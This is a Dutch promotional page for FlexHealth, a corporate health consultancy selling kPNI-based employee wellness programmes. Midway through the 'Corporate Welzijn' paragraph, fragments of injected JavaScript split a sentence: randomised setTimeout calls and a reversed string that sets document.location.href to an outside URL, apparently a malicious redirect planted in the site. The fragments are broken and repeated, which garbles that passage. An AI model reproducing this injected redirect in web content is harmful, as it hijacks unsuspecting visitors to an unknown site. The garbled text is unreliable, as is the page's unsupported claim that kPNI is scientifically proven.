//Bedrijfs-adviestraject
Bedrijfs-adviestraject 2019-04-18T11:11:34+01:00

FlexHealth

Flexhealth is een corporate health consultancy dat zich wil richten op de gezondheid van de werknemers binnen bedrijven. Hierin heeft het een tweeledige focus: aan de ene kant bieden wij een traject voor high performing professionals, denk hierbij aan werknemers in managementposities en mensen die onder flinke druk staan om consistent hoge targets te behalen. Aan de andere kant bieden wij ook een traject voor de algemene gezondheid van de werknemers. Dit traject co-creëren wij samen met de klant zodat wij de meest concrete oplossingen bieden. Met deze duale aanpak helpen wij u om een gezondheidsbewuste organisatie te creëren.

Visie

De wetenschap is al zover dat preventieve zorg realiteit is. Het heeft nog tijd nodig om in de bestaande gezondheidszorg te implementeren. Hierdoor wil ik voorlichting geven over de preventieve keuzes die een ieder kan maken om fit en alert te leven.

Een betere werk – leven balans op de corporate werkvloer in Nederland, door middel van preventieve en therapeutisch zorg. Immers: een actief en succesvol leven begint bij een gezonde geest in een gezond lichaam.

Onze methode

Onze methode is gebaseerd op kPNI, een oplossingsgerichte geneeswijze, bewezen door wetenschappelijke studies, met als resultaat een holistische aanpak:

 

Marijke Engelbrecht

De drijfveer achter FlexHealth is Marijke Engelbrecht. Marijke is een wetenschappelijk getrainde psycho-, neuro-, immunoloog met ruim dertig jaar ervaring in integrale geneeskunde. Deze brede kennis combineert ze met haar coaching competenties, waardoor ze snel doorziet wat de lichamelijke en/of psychische oorzaken zijn van persoonlijke belemmering en komt ze met een persoonlijk plan van aanpak om echte resultaten te behalen.

Bedrijfsadvies-traject

Met de huidige wetgeving dat de werkgever verantwoordelijk is voor de gezondheid van zijn werknemers, is het niet gek dat bedrijven steeds meer bezig zijn met de gezondheid van hun werknemers. Maar gelukkig gaan ook steeds meer bedrijven inzien – naast voorlopers als Google en Apple – dat een gezonde leef- en werkstijl positief effect hebben op de resultaten van het bedrijf.

Als doel om zowel medewerkers als de organisatie weer gezond en bevlogen te krijgen, zodat zij hun doelen kunnen bereiken. Dit doe ik door middel van gerichte voorlichting en adviezen over werkhouding, voeding en beweging op de werkvloer en stressmanagement. Vragen die beantwoord worden tijdens een adviestraject zijn bijvoorbeeld: Hoe voorkom je een burn-out, hoe ziet een gezonde lunch eruit, hoe houd je je concentratie en frisheid bij een vergadering, hoe verbeter je de gezondheid van medewerkers?

Corporate Welzijn:

Hoe creëer je een bedrijf dat gezondheid van werknemers bevorderd?
Iedere zakelijke ondernemer of manager wil een gezond bedrijf, sterk winstgevend en dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toekomst zeker. Maar zijn de medewerkers gezond? Een holistisch welzijnsprogramma helpt.

Zorg betreft gezondheid van de medewerkers is niet alleen goed voor het imago, maar ook een slimme zakelijke zet.

Wanneer er vaak “rook” pauze genomen wordt of wanneer iemand een dip heeft achter zijn bureau door verkeerde voeding, slapenloosheid of uitputting, werkt het team niet optimaal. Met als gevolg: resultaten beneden niveau en hogere ziektekosten. Echter, wanneer je de medewerkers gemotiveerd krijgt om over hun gezondheid na te denken, resulteert dit in winst voor het bedrijf. Ten slotte, hoe geringer ’t aantal ziektedagen, hoe meer productiviteit en winst.

Een gezonde cultuur ontstaat niet uit zichzelf. Geef als management het voorbeeld. Een uitgebreid welzijnsplan vraagt om actief betrokken management en human resources. Door samen dit traject te doorlopen, werknemer en baas, op een gezonde wijze competitief kan een soort bondgenootschap creëren: teambuilding. Promoot gezondheid zonder het op te leggen, en lever zo gezonde werkrelaties op.

Om dit succesvol te maken is een programma dat zich alleen op de gezonde werknemers richt niet voldoende. Immers, zijn het de werknemers die (bewust/onbewust) chronische ziektes met zich meedragen die het meeste kosten voor het bedrijf. Zo valt de echte winst te behalen, wanneer je deze werknemers ondersteunt met het traject van FlexHealth om zo betere en gezondere beslissingen te nemen.

Gezondheid moet actief gepromoot worden:
Vaak leveren bestaande alternatieven, zoals gezondheidsapps, een kortdurend resultaat op. Wanneer je een gezondheidscultuur wilt opbouwen moet er een menselijk aspect in het programma aanwezig zijn. Het met elkaar er over hebben, interacties zijn de beste stimulansen.
Hier komt FlexHealth in het spel, want wij faciliteren deze transitie naar een echte gezondheidscultuur.

Hoe kan een gezondheidsprogramma binnen het bedrijf integreren?
Mailings worden meestal genegeerd en raken bedolven in inboxen.
Maar het is ook niet nodig om er veel geld aan uit te geven, zoals voor iedere werknemer een fitness abonnement. Denk aan iemand met gedegen kennis van zaken die voorlichting komt geven over het belang van gezonde voeding, beweging, houding, slaap, stressmanagement en persoonlijke groei en hoe dat te implementeren op de werkvloer. Hierbij de bedrijfskantine niet vergeten! Dit kan in teamverband in de vorm van workshops of, waar nodig, 1 op 1 in belang van een werknemer. Zo bespaar je geld, worden werknemers gezonder, behaalt het hele bedrijf betere resultaten en word je aantrekkelijker voor nieuwe werknemers.

Resultaat van een bedrijfsadvies-traject:

  • optimale prestaties van de werknemers
  • betere communicatie
  • betrokkenheid
  • saamhorigheid
  • minder ziekteverzuim
  • grotere effectiviteit

Wilt u weten wat FlexHealth voor uw bedrijf kan betekenen? Neem gerust contact op voor meer informatie of het maken van een afspraak met FlexHealth. Tel: 0642146821